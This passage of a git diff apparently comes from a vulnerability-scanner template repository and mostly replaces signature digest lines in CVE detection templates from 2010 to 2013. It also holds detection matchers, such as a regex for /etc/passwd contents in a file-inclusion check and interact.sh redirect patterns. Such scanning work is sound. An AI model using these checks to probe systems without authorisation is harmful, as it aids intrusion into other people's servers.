4a0a00473045022100b399f4d9dc6b2c952a2ce9e388b0bc21714fffc806c4a6bb3f768981d57139d802206a1974d7ffcd57ea7f9084e535e8f10afddb089fec9a171050d073c28c510db6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2682.yaml b/http/cves/2010/CVE-2010-2682.yaml index 12114c5711..a571ad80c7 100644 --- a/http/cves/2010/CVE-2010-2682.yaml +++ b/http/cves/2010/CVE-2010-2682.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e54dec041c0ddf803f480a92dc938b5197eaccaa3b7d93595d7173b1d31967a902205f115ef5d5cc8c10542211659bdcab649f0b6c806f86c1516c6eac23b59977a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207d1d2f20ada527079788bebc1f7fb87e930823a6967b86b853d1b2d63ad60cc702203e9f6fa2c9063ccbb1dfe4f610e521bf0f622c6481c4b0cd4d1e44dd4dc57677:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2857.yaml b/http/cves/2010/CVE-2010-2857.yaml index 0f2dce1d94..20656fe948 100644 --- a/http/cves/2010/CVE-2010-2857.yaml +++ b/http/cves/2010/CVE-2010-2857.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200acbc1ccaa693223e471c0b7f67fbdd98e0d5c40b42a4a2e4a3f0559a365b37d0221008ba6e57f2a0ceb1577b6f7fb7b158cf1bc34dfddad0812b2ee421a0a69b90b74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a9df18c9b0d35866ea9765eaa67e92c811c401ee47b98f0ed80b8b20d1e61999022100bf0763eb2da8ee0ea76eaa0be32e72d2298820a16dbe45c9d2318c35b5cb37de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2861.yaml b/http/cves/2010/CVE-2010-2861.yaml index cb515e7ce1..f89f1e0f29 100644 --- a/http/cves/2010/CVE-2010-2861.yaml +++ b/http/cves/2010/CVE-2010-2861.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207f8fa432da803daaab9d93a50d455bd4b253e1baf1389db7b371373ab04383c0022051c87f230d25ca78e98d4f36c5b3f76f830e4410b06c13b120fb3b6cd852af4c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fb077ddbfc836210d14e4abbde779e3a4801cadf4c5e57973e1675ae37adab3002200a4dff0b074d16f33db367ba0f8a10fb0b418f6e9bf8cdd4f6036ec6db9d649a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2918.yaml b/http/cves/2010/CVE-2010-2918.yaml index 643a902e13..1546f38fc8 100644 --- a/http/cves/2010/CVE-2010-2918.yaml +++ b/http/cves/2010/CVE-2010-2918.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ad201a89d41f2f9cb4f6cb5a36258f55984850d7d53189667e7f86cce94fde16022100c9e422826d41ef265664527856e0183defb649569524750bf8763a2600a812c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210081baa41c250dff048e922e0bd675a0f66fa65d828db6fd1c6cff4362145b014502207a01230528658a21273d20b9529a24d7cf4f605849cae7697de730852ff82435:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-3426.yaml b/http/cves/2010/CVE-2010-3426.yaml index d262c0f4a9..0afdabacc4 100644 --- a/http/cves/2010/CVE-2010-3426.yaml +++ b/http/cves/2010/CVE-2010-3426.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008d132fbabdbb2dd48907d08ca476d99bc5ea2d2c77be0f19966d51e7cee9daf30220753904037ad6c1582d5a5e489b7469ea4d8648c0ff5e749566871f366cba7552:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220368e2242aeae3d34942385d4007b77e7b65af8ff3b65d7e76ff47cfe4e9424d2022044deeec7dbd324f3233d3ce8caddb62b744042f40f60d4819692cd7d208f949b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-4231.yaml b/http/cves/2010/CVE-2010-4231.yaml index 3c61444065..85c0b4a3a6 100644 --- a/http/cves/2010/CVE-2010-4231.yaml +++ b/http/cves/2010/CVE-2010-4231.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022011fc6a877e18402ac799591e32f2b92bda48b45419ce68226b8c85b78af92e28022100cc72d72aff42a4e9160cd39d4c35d3c5abdecbf4c13e1bca8c154d0256d6fb2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f3c7c9347f9d8a8e7b83098897aecc1fc6ca5594a43e83505cd43fdd025d6130022100832745cf9064f1897cb80f0caceac6dfa4b448f2bae9f8ca58b1b79ac602e833:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-4239.yaml b/http/cves/2010/CVE-2010-4239.yaml index 6a38eb1d2c..7f6b76880d 100644 --- a/http/cves/2010/CVE-2010-4239.yaml +++ b/http/cves/2010/CVE-2010-4239.yaml @@ -42,4 +42,4 @@ http: - "fonts" - "extensions" condition: and -# digest: 4b0a00483046022100c72bf60e8332e9f9e7170eafc256ff48192f4f1f1cbb399a548e9bf1c8adc172022100ade4664bdf59340a6dd7f216f5543f856a84864760ab5bff6274a422813be238:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b5b334a2fec00cf5a3aecc1339951bf57de03095d5f4265c23450b3a0c64bb5c02206338a21c9a89350f86820ccc9f08c7d37697834a200669fe085df7763d730318:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-4719.yaml b/http/cves/2010/CVE-2010-4719.yaml index 8d3bae1ad3..b65b57629d 100644 --- a/http/cves/2010/CVE-2010-4719.yaml +++ b/http/cves/2010/CVE-2010-4719.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ee34defa923089dc476a6b17e9dcbb482e3f5f97bfb22a6a18f483cf03eb69100220371d8869e59f4120db6edf37fc264501bb4b4f8c0f98b44f6b1608c43d174776:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207f173747822e13f460537c9f352c220b09c207c8d434d6851187c72c919607d9022100b83c290b935b1c2ab7d8803f7fba050894f359981c55eebe2e7b320f92dc2edd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-4977.yaml b/http/cves/2010/CVE-2010-4977.yaml index 57b62a1ddf..29d6cfbc01 100644 --- a/http/cves/2010/CVE-2010-4977.yaml +++ b/http/cves/2010/CVE-2010-4977.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200b05e3c8eaab3e4239d501db7a45e996e890485ca7d66a7e87bb4e96926502e90220098328d27756f3b62a663c491b54ec776e801c94d0ac4a3f5602ff55fe7ffa56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220090ace41aa0b7a63b491ff1b35ea977e018fd5f7ac4e5bebe586d7c925dab5ef0220211b310be5c582ef6ae23ddaeb61459599b65fb35f6b0ea543195a0f7cdf0a93:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-5278.yaml b/http/cves/2010/CVE-2010-5278.yaml index 610a17b2a2..55d16d1977 100644 --- a/http/cves/2010/CVE-2010-5278.yaml +++ b/http/cves/2010/CVE-2010-5278.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100de40290358f56cdef862841dd607dafddb3de4fb88d196897074c6f0e66b55b0022062e990cb1bda92259d5dc31880e5efef65c73f37d02203efd0db0941cd9b906d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008e76f7a4d677f1d7ef95c2948ec7ed1373b61aaf7d8079dee4d600ee0124e6a80220414a9a52b2fc1f231283eec54414a71ccd7fddfadfdfd55c76cddaa64c4d10f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-5286.yaml b/http/cves/2010/CVE-2010-5286.yaml index 0d6fdda612..58bfcca251 100644 --- a/http/cves/2010/CVE-2010-5286.yaml +++ b/http/cves/2010/CVE-2010-5286.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220614696e1997cbed1acbc9cbbcca43ca6242a804a5d0209c08d7f6486aafe544f02205394d5ddeab8508dd36dca8989553e4f7cb371855e4788b4aaa9c480773d1c55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203fb561e1ab44aaeb747e0238060527aad3bc02b20463ff0f288bc3d2ae95c3ff022062cf30b18e1bd5e1990e6fc55e60e0752092d76ff94a15f6061a6f373e4c3945:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-2744.yaml b/http/cves/2011/CVE-2011-2744.yaml index 0af15450d7..3019f09e60 100644 --- a/http/cves/2011/CVE-2011-2744.yaml +++ b/http/cves/2011/CVE-2011-2744.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202b3cee0e676305185f0663c74bbb8999671912267e23cd56c2df5c4849411f7a022100a051cac06715423c25022b92a27c5987f830261e9ed7064f1b224370a4e7b265:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220754b4ba2abae3c78a2e9e383db1f8a5610313a788aa30bae90556556e31a85d20221009bd64e51d469c11e836eb02211169a9efd4322295b411e2a9afe0f9efa702fa4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-2780.yaml b/http/cves/2011/CVE-2011-2780.yaml index 37ada8c50e..f51495187f 100644 --- a/http/cves/2011/CVE-2011-2780.yaml +++ b/http/cves/2011/CVE-2011-2780.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202cbad5e43b42a31e695c4e5b289137984e0c1de603885ca02fdd00fe65cc22e3022100b9f110f3b2e30b3c555b09a0b0167563913d530b7ac6cf97ffc4faeda42deb47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ab3340adb074a840c8283299b9fac09e4325d3a44d167aa3ac9d2827d14d49bd022100beb78853f6c850bc5953e75678cbccdce68edc349f14b91a45ad79f2eff254cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-3315.yaml b/http/cves/2011/CVE-2011-3315.yaml index c709a97407..d9a22bf862 100644 --- a/http/cves/2011/CVE-2011-3315.yaml +++ b/http/cves/2011/CVE-2011-3315.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201e42f7e3d836e9fce3de4ce3a385e83ca881afca40a53a36c9815a35c627428902210081ac72c639a506b407a3b154b1e9da7a3020d6ec8f23dd6209c2e06b866620e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203755f7c63e99d436630a8407a862c05b9ba15cc8afbe6ff69938ced0202577080220564c8d53df44ef235f4749d857dba8cc0317888378371e240f8aa04dc6b306fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-4336.yaml b/http/cves/2011/CVE-2011-4336.yaml index a1755a31c3..af1291bb6b 100644 --- a/http/cves/2011/CVE-2011-4336.yaml +++ b/http/cves/2011/CVE-2011-4336.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d2a2d6e8f054fb50465de88fea75ed0f7d8857bd60b2dc2a4ea7d9ba6748bbca022052210ffde4890a04665f15f02a5318b001ea64d17e2b205f5bfb5536f445d166:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cfd21e5afe0cd33f196e0f14cec829fe42b3b88a61c23a61a2615a34e01d4e6e022100899521b740fb94ec3a62f4001cafe59c17f13519b686323a2cb449a0265b4ad6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-4618.yaml b/http/cves/2011/CVE-2011-4618.yaml index 215b36230a..aefb6198d1 100644 --- a/http/cves/2011/CVE-2011-4618.yaml +++ b/http/cves/2011/CVE-2011-4618.yaml @@ -46,4 +46,4 @@ http: - 'contains(body_2, "")' - 'contains(body_1, "Advanced Text Widget")' condition: and -# digest: 4a0a0047304502203a6fc4d3bd5147ae843069de4a3361ad67df1bb64587db007ab1b3cc8d5ce9d9022100bbf33bb827645876020b81484e408b99615864df8d4457efdd7ea81f3cdda8ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200ae7d2b1eaa9716f2c9ca499a4059d499dc71155612efd70b3ff9ed1f9ab3a51022100a4febc922fbd52c77d48d4cfe79db3c53258501b17c1470e31c78df7a8c85308:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-4624.yaml b/http/cves/2011/CVE-2011-4624.yaml index bdde2930aa..5f4d004f0e 100644 --- a/http/cves/2011/CVE-2011-4624.yaml +++ b/http/cves/2011/CVE-2011-4624.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f747027756c1ce470e66270af63d3222037f2981bd0967fecc263d88f6d1c6ec02202927b3d30c6495036748c0a9eb2d5d946b8459dc589230b8f3ee0392f4a42e73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b67d93d6595fbfa0fc400a384a6d981e2ff4158deac7a93d81bb8c642f8be4e802203ae2132d654b0ee0651b2391d47fc90075395fb579c2540cac8a0f5cc4a255cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-4640.yaml b/http/cves/2011/CVE-2011-4640.yaml index 5a3ef9a97c..369e9bebd4 100644 --- a/http/cves/2011/CVE-2011-4640.yaml +++ b/http/cves/2011/CVE-2011-4640.yaml @@ -14,9 +14,11 @@ info: cvss-score: 4 cve-id: CVE-2011-4640 cwe-id: CWE-22 - cpe: cpe:2.3:a:spamtitan:webtitan:*:*:*:*:*:*:*:* + cpe: cpe:2.3:a:spamtitan:spamtitan:*:*:*:*:*:*:*:* metadata: max-request: 3 + product: spamtitan + vendor: spamtitan shodan-query: title:"WebTitan" tags: cve,cve2011,lfi,spamtitan,webtitan,authenticated @@ -46,4 +48,4 @@ http: - "regex('root:.*:0:0:', body)" - 'status_code_3 == 200' condition: and -# digest: 4a0a00473045022100cd186cd4d289f640e795d17187ff1c6bae1de96bb12faa284508c9c8e7007bbe02201b3379fbbc33d825f18756c1b131458e0e70b95c64d93a6b0da763aa7d2716d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022003bcdf3fd8c489c4c9eb2586491ed5595a9125404ba12366de7a36e801f261ac02200c78ce5a21dff8fd612356d665f441024b862909f23324c8b5ac220196e23ba4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-5106.yaml b/http/cves/2011/CVE-2011-5106.yaml index d2542c1fed..a5a828c58b 100644 --- a/http/cves/2011/CVE-2011-5106.yaml +++ b/http/cves/2011/CVE-2011-5106.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100865d5513292cc8d00cb7aa79119fd87ab835f5a27ff658d26f205da38ba6e5c8022100d27842b9d191679a90c77a495c5a4a79412ad8fe79c9166bba2e806016cae0af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206f0c48064742c5d41e5d5782430cbe65cfb58b1742f92b19ffbe74b895fb4a6702200800d1c7c4d52f58693af881c71484d3dc27308fcee85ac019f1d0f848653aeb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-5107.yaml b/http/cves/2011/CVE-2011-5107.yaml index f18d0ad1b0..3cec8ed738 100644 --- a/http/cves/2011/CVE-2011-5107.yaml +++ b/http/cves/2011/CVE-2011-5107.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205f5052032e52c3a970246ace434d8e8756fae1b121cc6385c20633fca723d0a30220540019830ab0e677d7cbd6cfb23d46e678eccbbe68574dc2ea270cd05afe139b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203f207874854b4aa193354fe4817d38a233085c5f216cea8baff174553df51ee302210081949b3401dcac7a30c4148a7d2328e56ea550fba0d6b054a560a8bf7ce14bba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-5252.yaml b/http/cves/2011/CVE-2011-5252.yaml index db2c0b3dad..50d55fd1ce 100644 --- a/http/cves/2011/CVE-2011-5252.yaml +++ b/http/cves/2011/CVE-2011-5252.yaml @@ -40,4 +40,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4a0a0047304502202d673b4b7cc1d784294304ab423ab567469818c5629174ef4db522882f1efa02022100fc9c5c6b6d14ff859b62ad27206a46a7e2b4cc06d3e6cced6cb311f03371b6a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200b2fd44a350bfac8b9bac4f7f86aeb7a8019759723bee2617c7e051c86595fff022100dcf8de39a664b6126476f780592008d1e2b96bd8c83db51134cc0d55ceac2719:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-5265.yaml b/http/cves/2011/CVE-2011-5265.yaml index 47a2cd9f4a..342624dc72 100644 --- a/http/cves/2011/CVE-2011-5265.yaml +++ b/http/cves/2011/CVE-2011-5265.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022029361b6083244cf6b1dc47aea6060557ff9c4cb263f5599b95bed3ead5d09219022033b6dbccd4b53a325cce3ae391166324c1bb82ca64667909318a9806547f9376:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c2aa0e6ccadf75dbc197cbac88064a58e27f0be6942493966fd37cb6dcb33f65022100a91825bf936f2d974098b4de055731d17fa74586f3d490ace28ac8096fa70cce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-0392.yaml b/http/cves/2012/CVE-2012-0392.yaml index e54bc1465d..5c7c2d6751 100644 --- a/http/cves/2012/CVE-2012-0392.yaml +++ b/http/cves/2012/CVE-2012-0392.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206fc3ad920bf56c3d45f5fa46e07ca2e1d167029d056a943572a04e196ba706ed022100889d1b80fab743373bfc7f429ed2c83bfc42a6bf78db2897e7ac9b99d6ee9895:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a3b82c57410275caf8c35b404ffc264121702280145d21c64ba210e9567cb6bf02210090f35b30c75342562029ea63c40b3d65ffd05f8f352fb02c7684cb12de64c278:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-0996.yaml b/http/cves/2012/CVE-2012-0996.yaml index 0b657a286f..3b63c970e3 100644 --- a/http/cves/2012/CVE-2012-0996.yaml +++ b/http/cves/2012/CVE-2012-0996.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022005f8d8c62b5aed878d928f7e2d5ee41cd3c7cd98091a03ebf39e1ec7950bb08c022100fcb7823f1d46ecac04f2f4d6f1d007a20bbff45e5e60e4ab4e60c8cf49e69ea1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100dc98cb6602e352bb8aa5efef1e54d6688d25f22ecbc3efaf5dce9484e5c80bfe02203f7741f62e7ad4d61e9fdc7d9e70ce5d6c6615fd714eba4d750f487ed7c55c29:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-1835.yaml b/http/cves/2012/CVE-2012-1835.yaml index ff3ec8d967..3f5fca49c2 100644 --- a/http/cves/2012/CVE-2012-1835.yaml +++ b/http/cves/2012/CVE-2012-1835.yaml @@ -65,4 +65,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022061716a628ee9ba75c32b638ac25629b58133a31fc58d1df2ded9cb55c9be9c6c022037475ba3ce1bd8f5649eb3d95c8f3769a9f0a781a740ede43648accb71f282ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f2f345ee3cde748854d58313525dda77877093565330119f95e2cb52279a98c402202527c85bb66bf8f42714f5113a2d3cd6ff5c1d6ba00a529e7ba17f2e8b4063d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-2371.yaml b/http/cves/2012/CVE-2012-2371.yaml index 69bc2578e6..d428239d8c 100644 --- a/http/cves/2012/CVE-2012-2371.yaml +++ b/http/cves/2012/CVE-2012-2371.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100fa8e6357a8c9a51add02478e6c383b01ced6d3917681c0c6892ef2a2de2b5781022059680d4ae895badc6871e6b6bf765e7b5b1bd977da7151a4f48e1fed65808261:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206adf0f5c7cffe288bd664cbf8fa12d1735c4880d6a67def035827c040cdaaa6a022073e999b0b8dd4d749994566b75bbcf4d4360f9cc5e215b4d2444728755ade3b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4253.yaml b/http/cves/2012/CVE-2012-4253.yaml index b34c5ca69b..27efb88ce1 100644 --- a/http/cves/2012/CVE-2012-4253.yaml +++ b/http/cves/2012/CVE-2012-4253.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100de6cb5ae696eb8f0b8837ff02b5e53e8049e806e0253c9933027f7da28634071022100fc1518b608713661374a7f1ebd5ef01b8816925196928a73aa3882adf5bf8192:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022034f990a5bff340326f593c8b149d2c1411d20ed9cf0844eb64585b1dbdc6f1e202204f319f36ce4f7c1b596ec339117b0cb8b258df92388a6d342faa644f81bc658f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4273.yaml b/http/cves/2012/CVE-2012-4273.yaml index 1352b054db..d48be61c26 100644 --- a/http/cves/2012/CVE-2012-4273.yaml +++ b/http/cves/2012/CVE-2012-4273.yaml @@ -65,4 +65,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100916363ee0bee59e4bed69622ce14fd2346d92c46a5e0bce94fcc34ae2c08f6320221008eab0ce89df2b33314005da032508dbeccc3d008422471197b5bf204d616ea78:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e6ffcd1141ff4c5fd403a66db6359c6625b3c09923f66650b5f9e1d75c3748f10221009fc9817d084804e112a600871b1ab87834d1d0aa580ef289bab73482a7f3b83d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4768.yaml b/http/cves/2012/CVE-2012-4768.yaml index 54ff22c13e..bff6606365 100644 --- a/http/cves/2012/CVE-2012-4768.yaml +++ b/http/cves/2012/CVE-2012-4768.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b62b036d8a6318dfce40cbeb7c18e3c776b2b6a840a4a6fb9b1ea7104eb2c87a022100c85a60648110254d40cc33cf3daa10856afb5d4e7de8034a01ec26b7a29c4c30:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022022e9b17971d48a9c3f0e7e276d3fd3a420c9c0743175458179cdb1a73cb6cdd9022071d9ffe8b3c9d6f1fb55d65ef6cb3e687de49dfb2d40ab09266fcf3293275241:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4878.yaml b/http/cves/2012/CVE-2012-4878.yaml index d08fbbf00c..8182a35a3e 100644 --- a/http/cves/2012/CVE-2012-4878.yaml +++ b/http/cves/2012/CVE-2012-4878.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008853a250ba3541e1f30956a91c714712b3abb9387643cbaa63e791d8ef44136302200d01eafc99ca2c45da03a0546fac6328c9ebe9ab132bc1f1b7c5fb6037ddbcc9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022004d8fe62c4b1e4ae5fad5b00d2fbb3ac41df89d07c06c9e48d5c952daafaa270022074ccc1e336fd99ee274e49b7329eee333556e948e73146f43ea24bb859d484ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4889.yaml b/http/cves/2012/CVE-2012-4889.yaml index 63ecbffe52..be960aed11 100644 --- a/http/cves/2012/CVE-2012-4889.yaml +++ b/http/cves/2012/CVE-2012-4889.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009702b9da14f810d6eeaef6f02c62f884cfca24517e3947b4eb308770815e5d7b022100a5ce9a8170755f1c2a7ada77a63325c9d0572af46a756964929eda81b81ef4d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206873d1a172063dc9a5a94a9f66edea5ecbe5e334fead9102b967749fc37c8c58022100e18a924b1471c89a90d61dfaa30a48404a730f05848f837747358b8095d8093e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4982.yaml b/http/cves/2012/CVE-2012-4982.yaml index 2133ac7ad9..f427fcec55 100644 --- a/http/cves/2012/CVE-2012-4982.yaml +++ b/http/cves/2012/CVE-2012-4982.yaml @@ -40,4 +40,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4b0a00483046022100fd1dbc8803c43b9fa3d0e32828c15e994a16437a5d08376f1da2e13f152411a6022100f0b8443694f31234144b52b46c8ef50c84da5ecb159d24b2ba4b88e2d808e34b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a867f8c46181e25c0ee65381c656fd5b0908d6074f18923c3e96c2754c8995b8022100888f743fb311fd2ddba83def7cad4a6946a20a18d6b17fa3ed8b1151808c8154:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-5913.yaml b/http/cves/2012/CVE-2012-5913.yaml index 6cf2e35f52..e6543c8e26 100644 --- a/http/cves/2012/CVE-2012-5913.yaml +++ b/http/cves/2012/CVE-2012-5913.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b621695e386fdceb63456bafa440c49d8ef03a88ddd082aff097f38e76a7eae3022100b7baeaaa782c1567cc53216d9581f33f8b26bd8bc96779d1754432ac9bfab362:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fbe06c1643facb4dc3ad358a296536ac962d6325b75aaedc06ab4156644f9ea6022100c808d736938757f964a76f35767e4d19a4944596c0700c04cdbbe337825c5e67:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-2248.yaml b/http/cves/2013/CVE-2013-2248.yaml index e278d581fc..b377638929 100644 --- a/http/cves/2013/CVE-2013-2248.yaml +++ b/http/cves/2013/CVE-2013-2248.yaml @@ -38,4 +38,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 490a004630440220421440fbfd710bcd3575923939f7bcee9cea832b6aa817f8102423365758cf2802201dd993c096ba3bde74f7c986e84bbd2d92947e50c394fd11f337f5fc0d7be2d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210097e5f1c5992fd137ee9d5d2670140430f951cc20184ef1ed7a7e29b86b39c799022100a1ee651b62a2b6686d84b3e91e268b379fc002179a6094743d68c357e8ffe4b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-2287.yaml b/http/cves/2013/CVE-2013-2287.yaml index 7863b2e020..6a7888f671 100644 --- a/http/cves/2013/CVE-2013-2287.yaml +++ b/http/cves/2013/CVE-2013-2287.yaml @@ -64,4 +64,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ea92d4f2aeab4e789c6bfa4a4c04bb228683d53a8b96eb2e3e04cee1ad1e67370220791c3686925739a25ca487b1b792e41037ae378bc4909db98a63f1e284638e18:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204cba18e262345fffa5105d815d0291570f37e61c054eb2c23472ca554e7ad7df0221009e069be780c7888803b62556410259dd0b27a7864aea3030a28e49042e8e6b28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-4625.yaml b/http/cves/2013/CVE-2013-4625.yaml index 25f6da2d6d..97ad7cbf1b 100644 --- a/http/cves/2013/CVE-2013-4625.yaml +++ b/http/cves/2013/CVE-2013-4625.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 